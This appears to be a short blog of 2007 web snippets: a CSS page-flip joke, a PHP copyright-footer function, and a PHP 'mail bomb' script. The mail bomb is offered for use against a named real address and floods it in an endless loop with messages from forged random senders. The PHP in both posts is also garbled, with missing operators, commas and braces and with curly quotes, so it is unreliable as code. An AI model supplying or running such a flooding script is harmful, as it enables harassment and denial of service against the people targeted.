May 29

Here is a nice code which flips a webpage, nice for joke :)
<style type="text/css">
body { filter: fliph flipv };
</style>

May 28

First, save this file as functions_copyright.php:

<?php 
# [FUNCTIONS_COPYRIGHT.PHP] 
# © Jan Marques, 2007 

function copyright($naam$jaar$sitelink NULL

$nu date(“Y”); 
if (empty(
$sitelink)) 
  echo 
“&copy; ” htmlentities($naam) . “, ” $jaar “ - ” $nu
else 
  echo 
“&copy; <a href=\”” $sitelink “\” target=\”_blank\”>” htmlentities($naam) . “</a>, ” $jaar “ - ” $nu

?> 


then, on the page where your footer is, put
include(“functions_copyright.php”);
and on the place you’d like to show it
copyright(“Your Name ““Startyear"“http://www.sitelink.com”);
or
copyright(“Your Name ““Startyear”);
if you don’t have a site

May 18

Hi all,
below, a file that can be used to send a mail bomb :)
You only need to change target@target.com, for the target.
He will get hundreds/thousends of email with random title/sender/content :)
Result => no spam filter can resist :D

<?php 
# [BOM.PHP]
# © Jan Marques, 2007
#
/* Edit reciepent */
$target “bill@microsoft.com”;
/* The script */
set_time_limit(1);
while(
true
{
    
mail($targetmd5(rand()), md5(rand()), “From: ” md5(rand()) . “@” md5(rand()) . “.” md5(rand()));
}
?>